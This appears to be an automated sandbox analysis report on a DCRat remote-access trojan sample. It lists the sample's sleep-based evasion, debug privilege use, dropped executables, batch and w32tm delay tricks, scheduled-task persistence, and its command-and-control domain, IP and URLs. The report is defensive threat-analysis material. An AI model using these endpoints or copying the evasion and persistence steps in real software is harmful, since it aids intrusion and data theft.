Source: C:\Users\user\Desktop\QT4aLb3P98.exe TID: 6464 Thread sleep count: 945 > 30 Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe TID: 5076 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7180 Thread sleep count: 369 > 30 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 5600 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7196 Thread sleep count: 359 > 30 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7196 Thread sleep count: 1014 > 30 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7244 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7244 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7244 Thread sleep time: -599891s >= -30000s Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7244 Thread sleep time: -599782s >= -30000s Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 3804 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7296 Thread sleep count: 899 > 30 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7300 Thread sleep count: 131 > 30 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe TID: 7272 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 599891 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 599782 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: w32tm.exe, 00000009.00000002.1738132193.00000180BDA07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wRRcPdViqk.exe, 0000000B.00000002.1720190148.000000001B501000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe "C:\Windows\Media\Sonata\wRRcPdViqk.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Queries volume information: C:\Users\user\Desktop\QT4aLb3P98.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Queries volume information: C:\Windows\Media\Sonata\wRRcPdViqk.exe VolumeInformation Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Queries volume information: C:\Windows\Media\Sonata\wRRcPdViqk.exe VolumeInformation Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Queries volume information: C:\Windows\Media\Sonata\wRRcPdViqk.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected DCRat
Source: Yara match File source: 00000000.00000002.1687936780.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1818454348.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1716375349.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1687936780.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1774437286.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1688308009.000000001327F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: QT4aLb3P98.exe PID: 6872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wRRcPdViqk.exe PID: 5696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wRRcPdViqk.exe PID: 5104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wRRcPdViqk.exe PID: 7252, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected DCRat
Source: Yara match File source: 00000000.00000002.1687936780.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1818454348.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1716375349.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1687936780.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1774437286.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1688308009.000000001327F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: QT4aLb3P98.exe PID: 6872, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wRRcPdViqk.exe PID: 5696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wRRcPdViqk.exe PID: 5104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: wRRcPdViqk.exe PID: 7252, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483427 Sample: QT4aLb3P98.exe Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 40 a1009608.xsph.ru 2->40 46 Multi AV Scanner detection for domain / URL 2->46 48 Found malware configuration 2->48 50 Antivirus detection for URL or domain 2->50 52 12 other signatures 2->52 8 QT4aLb3P98.exe 4 12 2->8         started        12 wRRcPdViqk.exe 2 2->12         started        14 wRRcPdViqk.exe 14 3 2->14         started        signatures3 process4 dnsIp5 32 C:\Windows\Media\Sonata\wRRcPdViqk.exe, PE32 8->32 dropped 34 C:\Program Files\...\wRRcPdViqk.exe, PE32 8->34 dropped 36 C:\Users\user\AppData\...\eE9QbXcUOX.bat, DOS 8->36 dropped 38 2 other malicious files 8->38 dropped 54 Uses schtasks.exe or at.exe to add and modify task schedules 8->54 56 Creates processes via WMI 8->56 17 cmd.exe 1 8->17         started        20 schtasks.exe 8->20         started        22 schtasks.exe 8->22         started        24 4 other processes 8->24 58 Multi AV Scanner detection for dropped file 12->58 42 a1009608.xsph.ru 141.8.192.103, 49730, 80 SPRINTHOSTRU Russian Federation 14->42 file6 signatures7 process8 signatures9 44 Drops executables to the windows directory (C:\Windows) and starts them 17->44 26 wRRcPdViqk.exe 2 17->26         started        28 w32tm.exe 1 17->28         started        30 conhost.exe 17->30         started        process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
141.8.192.103
 a1009608.xsph.ru Russian Federation
35278 SPRINTHOSTRU true

Contacted Domains

Name IP Active
a1009608.xsph.ru 141.8.192.103 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF true
  • Avira URL Cloud: malware
 unknown
http://a1009608.xsph.ru/@=MjZ2QmMzETM true
  • 4%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown